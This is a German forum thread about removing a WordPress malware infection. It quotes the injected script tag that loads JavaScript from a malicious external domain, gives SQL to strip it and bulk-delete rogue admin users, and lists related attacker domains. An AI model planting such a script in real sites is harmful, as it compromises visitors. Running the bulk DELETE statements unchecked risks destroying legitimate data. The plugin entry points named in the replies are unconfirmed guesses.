Schneller Fix für Wordpress Malware: wiilberedmodels.com

Seite 1 von 1 - Forum: Coding Stuff auf overclockers.at

URL: https://www.overclockers.at/coding-stuff/schneller-fix-fuer-wordpress-malware-wiilberedmodels-com_254326/page_1 - zur Vollversion wechseln!

mat schrieb am 09.09.2019 um 17:56

Nachdem ich gerade für einen Kunden mehrere Wordpress-Seiten von einer in dieser Form noch nicht dokumentierten Malware-Attacke befreit habe, dachte ich mir, dass ich den SQL-Code hier veröffentliche, der die Probleme bereinigt:

Der Schadcode lautet:

Code: JS

<script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script>

Folgende Fixes können zB per phpMyAdmin bei der betroffenen Datenbank eingespielt werden:

Code: SQL

UPDATE `wp_posts` SET post_content=REPLACE(post_content,"<script src='https://js.wiilberedmodels.com/pystats.js?l=l&' type=text/javascript language=javascript></script>","");

Es wird auch ein Admin-User mit unterschiedlichem Namen und einer ID > 900.000 angelegt. Diese könnt ihr händisch löschen. Folgendes SQL-Statement löscht euch alle User mit einer ID > 900.000 aus den Tabellen und setzt den Autoincrement-Wert der Tabellen zurück.

Code: SQL

DELETE FROM `wp_users` WHERE `wp_users`.`ID` > 900000;
DELETE FROM `wp_usermeta` WHERE `wp_usermeta`.`user_id` > 900000;
ALTER TABLE `wp_users` AUTO_INCREMENT = 1;
ALTER TABLE `wp_usermeta` AUTO_INCREMENT = 1;

Wichtig #1: Falls ein Cache-Plugin verwendet wird (WP SuperCache oder W3 Total Cache zB), dann muss der jeweilige Cache ebenfalls geleert werden!

Wichtig #2: Vor dem Ausführen des Codes sollte unbedingt die Datenbank gebackupt werden! Ich bin nicht für einen Datenverlust verantwortlich.

Derzeit gibt es noch keine Details wie der Schadcode in die Datenbank gelangt. Wahrscheinlich über eine Schwachstelle eines Wordpress-Plugins. Ich verdächtige derzeit den Advanced Access Manager oder das "Cookie Notice"-Plugin. Mehr Zeit hatte ich leider nicht. Ich bin mir sicher, dass in den nächsten Tagen mehr dazu auftaucht.

spunz schrieb am 09.09.2019 um 18:19

Ich hatte vergleichbares vor ~3 Wochen, neben AAM dürfte auch Simple 301 Redirects ein Einfallstor sein:

activeandbanflip.com
gabriellalovecats.com
developsincelock.com
jackielovedogs.com
wiilberedmodels.com

Smut schrieb am 09.09.2019 um 18:27

Welche Version hatte WordPress zum Zeitpunkt der Kompromittierung?
Gab letzte Woche ein security Update.
https://wordpress.org/news/2019/09/...enance-release/

mat schrieb am 09.09.2019 um 18:43

Alle drei Seiten, die ich befreit habe, waren letzte Woche am neuesten Stand. Es ist irgendwann im Laufe der letzten Woche passiert, der Hack wurde aber erst durch ein Login ins Admin Panel aktiv.

Edit: Dieser Punkt aus dem Change Log von 5.2.3 klingt sehr ähnlich.

Zitat
Props to Ian Dunn of the Core Security Team for finding and disclosing a case where reflected cross-site scripting could be found in the dashboard.